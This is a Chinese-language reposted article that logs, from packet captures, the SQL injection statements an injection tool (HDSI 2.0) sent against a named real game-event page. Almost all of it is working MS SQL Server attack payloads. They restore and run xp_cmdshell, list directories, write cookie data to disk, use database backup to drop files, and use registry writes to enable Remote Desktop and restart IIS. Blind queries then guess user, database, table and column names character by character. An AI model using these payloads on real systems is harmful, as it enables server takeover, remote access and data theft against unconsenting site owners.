在Hdsi2.0 SQL的註入部分抓包分析語句

-Advertisement-

在Hdsi2.0 SQL的註入部分抓包分析語句恢復cmd ;insert tb1 exec master..xp_cmdshell''net user ''-- ;exec master.dbo.sp_addextendedproc ''xp_cmdshell'',''xplog70.dll''-

恢復cmd

;insert tb1 exec master..xp_cmdshell''net user ''--

;exec master.dbo.sp_addextendedproc ''xp_cmdshell'',''xplog70.dll''--

執行命令：

sql: ;ipconfig -all--

dos：

;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell
"ipconfig

-all"--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0

列目錄：
c: jiaozhu 臨時表

;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu
EXEC

MASTER..XP_dirtree "c:",1,1--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0

上傳文件：

本地路徑：C:\Inetpub\wwwroot\cook.txt 保存位置：c：

資料庫存儲過程：

;exec master..xp_cmdshell '' echo

cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%
20cdb_visitedfid=12;%2

0cdb_oldtopics=D8D>c:\''--

資料庫備份：(上傳後刪除臨時表)

;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--

;insert into xiaopan(cmd) values('' echoStr '')--

;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=''c:/'' backup database @a todisk=@s WITH
DIFFERENTIAL,FORMAT--

;Drop table [xiaopan]--

開啟3389：

;declare @r varchar(255) set @r=''hkey_local_machine''exec master..xp_regwrite

@r,''software\microsoft\windows\currentversion\netcache'',''enable'',''reg_sz'',''0'';-
---

;declare @r varchar(255) set @r=''hkey_local_machine''exec master..xp_regwrite @r,''software\microsoft\windows

nt\currentversion\winlogon'',''shutdownwithoutlogon'',''reg_sz'',''0'';----

;declare @r varchar(255) set @r=''hkey_local_machine''exec master..xp_regwrite

@r,''software\policies\microsoft\windows\installer'',''enableadmintsremote'',''reg_dword'',1;----

;declare @r varchar(255) set @r=''hkey_local_machine''exec master..xp_regwrite @r,''system\currentcontrolset\control
\terminal

servert'',''senabled'',''reg_dword'',1;----

;declare @r varchar(255) set @r=''hkey_local_machine''exec master..xp_regwrite

@r,''system\currentcontrolset\services\termdd'',''start'',''reg_dword'',2;----

;declare @r varchar(255) set @r=''hkey_local_machine''exec master..xp_regwrite

@r,''system\currentcontrolset\services\termservice'',''start'',''reg_dword'',2;----

;declare @r varchar(255) set @r=''hkey_local_machine''exec master..xp_regwrite ''hkey_users'',''.default\keyboard

layout\toggle'',''hotkey'',''reg_sz'',''1'';----

;declare @r varchar(255) set @r=''hkey_local_machine''exec master..xp_cmdshell ''iisreset /reboot'';----

註入分析：數字型 SQL錯誤提示關閉開啟 access

使用關鍵字寶石公園“你玩我抽”中獎名單公佈

http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57

多句查詢支持
子查詢   支持
許可權   public
當前用戶 dbo
當前庫   event

;create table t_jiaozhu(jiaozhu varchar(200))

And 1=1
And 1=2
And (Select Count(1) from SYSObjects)>0
and (select len(user))<32
;declare @a int--
And (IS_SRVROLEMEMBER(''sysadmin''))=1
And (IS_MEMBER(''db_owner''))=1
and (select len(user))<16
and (select len(user))<4
and (select len(user))<2
and (select len(user))<3
and (select len(user))<3
and (select len(user))<4
and (select ascii(substring(user,1,1)))<80
and (select ascii(substring(user,2,1)))<80
and (select ascii(substring(user,3,1)))<80
and (select ascii(substring(user,1,1)))<104
and (select ascii(substring(user,2,1)))<104
and (select ascii(substring(user,3,1)))<104
and (select ascii(substring(user,1,1)))<92
and (select ascii(substring(user,2,1)))<92
and (select ascii(substring(user,3,1)))<116
and (select ascii(substring(user,1,1)))<98
...
...
...

and (select len(db_name()))<16
and (select len(db_name()))<8
and (select len(db_name()))<4
...
...
...

and (select ascii(substring(db_name(),1,1)))<80
and (select ascii(substring(db_name(),2,1)))<80
and (select ascii(substring(db_name(),5,1)))<85

跨庫：

猜解資料庫：

GET

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6
and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7
...
...
...

and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid

desc) <104
and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by
dbid

desc) <104
...
...
...

and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5

master 不是sa許可權，不能跨庫

猜解表名：

EventCategory

GET
and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T

order by id desc) < 80

and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T

order by id desc) < 80

and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char
(85)) T

order by id desc) < 80

and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))
T

order by id desc) < 80

猜解列名：

GET

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name=''EventCategory'')<32
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name=''EventCategory'')<48
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name=''EventCategory'')<56
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name=''EventCategory'')<60
and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name=''EventCategory'')<62
and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where
A.id=B.id and

B.name=''EventCategory'' order by A.name desc) T order by name asc )<35

轉載自:http://www.aspnetjia.com/Cont-204.html

您的分享是我們最大的動力!

-Advertisement-

更多相關文章

ios開發中的Swift面向對象

iOS在現代電腦語言中，面向對象是非常重要的特性，Swift語言也提供了面向對象的支持。而且在Swift語言中，不僅類具有面向對象特性，結構體和枚舉也都具有面向對象特性。 1、Swift中的類和結構體 Swift中的類和結構體定義的語法也是非常相似的。我們可以使用class關鍵詞定義類，下麵我們定
iOS鬧鐘實現

UILocalNotification *notification=[[UILocalNotification alloc] init]; if (notification!=nil) { NSDate *now=[NSDate new]; //notification.fireDate=[now
iOS 蘋果開發證書失效的解決方案(Failed to locate or generate matching signing assets)

從2月14日開始,上傳程式的同學可能會遇到提示上傳失敗的提示. 並且打開自己的鑰匙串,發現所有的證書全部都顯示此證書簽發者無效. 出現以下情況： Failed to locate or generate matching signing assetsXcode attempted to locate
android-webview的使用小結

不知道你有沒有註意，最近的app中越來越多的使用webview了，個人感覺，一方面是因為微信公眾號開發增多的促進，讓很多頁面開發後用到微信上面後，還要唚在公司的app中使用，又加上html5的進一步火熱，可以跨平臺使用，一次開發，可以用在Ios,android客戶端上，這樣，極大的節省了公司的開發成
iOS CoreData 開發之數據模型關係

apple提供了CoreData作為數據存儲的一種手段。本人對其他的第三方不來點，喜歡apple的親兒子，原汁原味，就研究學習這個了。本次帶來CoreData相關數據模型關係操作。
簡述.NET事務應用原則

.NET事務應用原則 1.在同一個資料庫內進行CRUD時，應使用同一個DbConnection對象，且顯式指定DbConnection均為同一個DbTransaction，示例代碼如下： //在同一個DB中操作一個表時，可以不用顯式指定事務，因為單條SQL命令就是一個最小的事務單元 using (D
MySQL Range Optimization

8.2.1.3 Range Optimization MYSQL的Range Optimization的目的還是儘可能的使用索引 The range access method uses a single index to retrieve a subset of table rows that a
SQL Server的優點與缺點

一般來說索引會加快查詢速度,但會影響插入,修改,刪除的數據,且占用物理空間;所以我們應該合理的創建索引,而且應該先創建聚合索引,再創建非聚合索引.要在經常進行查詢的列上創建索引,而且如果表列較少的話要避免過多創建索引;優點詳細描述:創建索引可以大大提高系統的性能。第一，通過創建唯一性索引，可以保證數